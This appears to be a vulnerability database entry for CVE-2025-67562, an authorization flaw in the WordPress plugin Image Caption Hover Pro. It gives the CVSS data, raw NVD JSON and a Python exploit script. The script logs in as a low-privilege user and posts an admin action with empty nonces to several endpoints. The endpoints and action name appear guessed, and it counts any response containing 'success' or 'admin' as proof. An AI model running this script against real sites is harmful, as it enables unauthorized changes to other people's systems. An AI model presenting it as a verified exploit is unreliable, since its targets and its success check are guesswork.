Security Vulnerability Report
中文
CVE-2025-67562 CVSS 5.4 MEDIUM

CVE-2025-67562

Published: 2025-12-09 16:18:33
Last Modified: 2026-04-27 18:16:43

Description

Missing Authorization vulnerability in WebCodingPlace Image Caption Hover Pro image-caption-hover-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Caption Hover Pro: from n/a through < 20.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Image Caption Hover Pro < 20.0
Image Caption Hover Pro from n/a through < 20.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67562 PoC - Image Caption Hover Pro Authorization Bypass # Target: WordPress site with Image Caption Hover Pro < 20.0 import requests import sys from urllib.parse import urljoin def exploit_cve_2025_67562(target_url, username, password): """ Exploit for Missing Authorization vulnerability in Image Caption Hover Pro This PoC demonstrates accessing admin-only functions with low-privilege user """ # Setup session session = requests.Session() # Login as low-privilege user (subscriber role) login_url = urljoin(target_url, 'wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } print(f'[*] Attempting login as {username}...') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies: print('[-] Login failed!') return False print('[+] Login successful!') # Identify vulnerable endpoint # Common vulnerable endpoints in this plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-content/plugins/image-caption-hover-pro/includes/ajax-handler.php', '/wp-json/wp/v2/settings' ] # Attempt to access admin-only functionality print('[*] Attempting to exploit authorization bypass...') for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) # Example: Try to trigger plugin's admin action with subscriber session exploit_data = { 'action': 'image_caption_hover_pro_admin_action', 'nonce': '', 'security': '' } try: response = session.post(full_url, data=exploit_data, timeout=10) # Check for successful exploitation indicators if response.status_code == 200: if 'success' in response.text.lower() or 'admin' in response.text.lower(): print(f'[+] Potential vulnerability confirmed at: {endpoint}') print(f'[+] Response: {response.text[:200]}...') return True except requests.exceptions.RequestException as e: print(f'[-] Error accessing {endpoint}: {e}') print('[-] Exploitation did not yield clear results') print('[*] Manual verification may be required') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve_2025_67562.py <target_url> <username> <password>') print('Example: python cve_2025_67562.py http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_67562(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67562", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:32.693", "lastModified": "2026-04-27T18:16:43.443", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WebCodingPlace Image Caption Hover Pro image-caption-hover-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Caption Hover Pro: from n/a through < 20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/image-caption-hover-pro/vulnerability/wordpress-image-caption-hover-pro-plugin-20-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}